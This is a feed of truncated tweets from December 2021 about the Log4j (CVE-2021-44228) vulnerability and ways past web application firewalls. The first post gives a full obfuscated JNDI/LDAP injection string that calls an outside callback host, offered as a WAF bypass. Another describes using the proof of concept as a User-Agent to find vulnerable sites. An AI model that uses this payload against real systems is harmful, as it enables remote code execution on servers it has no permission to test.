Found a bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Enjoy bounty season ...December 12, 2021
Hey @MeghBulletin it probably happened due to log4j zeroday vulnerability found on twitter,steam,icloud etc. This is going on since past 2 days. The s ...December 12, 2021
There are so many possible bypass available, I changed the regex to be only ${.*//(.*)} because that's the only real way to be sure! Except I'm still ...December 11, 2021
This is such a silly take. We were seeing WAF bypass attempts in our logs on Thursday, way before Twitter was talking about them.
In fact, talking ab ...December 11, 2021
Just like that, @realgam3 & @nirzigler have updated and enhanced these signatures to provide better coverage on bypass attempts. Thank you for wor ...December 11, 2021
Here is some recent research on how to bypass the current generation of WAF rules trying to block the ongoing Log4j RCE incident. #upgrade
https://t. ...December 11, 2021
How i was able to bypass Cloudflare WAF for SQLi payload https://t.co/ZDMfLitH1J #infosec #infosecurity #cybersecurity #threatintel #threatintelligenc ...December 11, 2021
Interactsh auf. Den PoC-Code als User-Agent einstellen und durch die Welt surfen. Wer verwundbar ist meldet sich dann. Cloudflare blockt es, aber es g ...December 11, 2021
New Write-up on InfoSec Write-ups publication : "How i was able to bypass Cloudflare WAF for SQLi payload" #bugbounty #bugbountywriteup #bugbountytips ...December 11, 2021
Polaris rolled out protection for our customers using our Web Application & API Protection against log4j2 vulnerability (CVE-2021-44228). We have ...December 11, 2021